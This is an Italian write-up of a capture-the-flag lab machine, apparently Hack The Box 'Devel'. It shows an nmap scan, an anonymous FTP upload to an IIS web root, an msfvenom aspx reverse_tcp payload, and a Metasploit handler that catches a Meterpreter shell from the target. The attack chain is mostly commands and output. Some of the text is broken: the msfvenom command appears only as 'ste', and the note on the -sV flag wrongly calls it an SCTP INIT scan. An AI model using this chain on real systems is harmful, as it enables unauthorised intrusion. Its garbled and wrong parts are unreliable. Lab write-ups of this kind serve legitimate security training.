Con nmap effettuiamo una scansione delle porte e dei servizi aperti; la sintassi è sudo nmap -sV -sT -O -A -p- <INDIRIZZO IP> dove:
-sV indicano un SCTP INIT scan,
-sT indicano un TCP connect scan,
-O indica il riconoscimento del Sistema Operativo,
-A indica una scansione “invasiva”,
-p- indica la scansione di tutte le porte.
La scansione con nmap rivela aperte le seguenti porte:
21 – ftp,
80 – http.
kali@kali:~$ sudo nmap -sV -sT -O -A -p- 10.10.10.5
[sudo] password di kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-10 18:36 CEST
Nmap scan report for 10.10.10.5
Host is up (0.039s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
| 06-14-20 12:21AM 2824 met.aspx
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Accediamo all’ftp con utente anonimo per verificarne il contenuto scoprendo che l’ftp è utilizzato per gestire i contenuti del sito; proviamo ad uplodare un file, con successo.
kali@kali:~$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
ftp> passive
Passive mode on.
ftp> put /home/kali/Documenti/HTB/Devel/File File
local: /home/kali/Documenti/HTB/Devel/File remote: File
227 Entering Passive Mode (10,10,10,5,192,13).
150 Opening ASCII mode data connection.
226 Transfer complete.
ftp>
Generiamo un payload di reverse_tcp con msfvenom utilizzando la sintassi msfvenom -p <NOME PAYLOAD> LHOST=<INDIRIZZO IP KALI> LPORT=<NUMERO PORTA> -f <TIPO FILE> -o <NOME FILE DI OUTPUT>.
kali@kali:~$ ste
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2802 bytes
Saved as: reverse.aspx
Tramite ftp carichiamo il payload sulla macchina target.
tp> passive
Passive mode on.
ftp> put reverse.aspx
local: reverse.aspx remote: reverse.aspx
227 Entering Passive Mode (10,10,10,5,192,16).
150 Opening ASCII mode data connection.
226 Transfer complete.
2857 bytes sent in 0.00 secs (20.7988 MB/s)
Usiamo meterpreter per aprire una shell in ascolto sulla porta 4444 utilizzando lo stesso payload creato precedentemente secondo la sintassi use eploit/multi/handler seguito da set payload <PATH DEL PAYLOAD>. Diamo run per eseguire.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
Eseguiamo il payload dal browser web ed otteniamo una shell.

msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.5:49173) at 2020-06-11 11:57:59 +0200
meterpreter >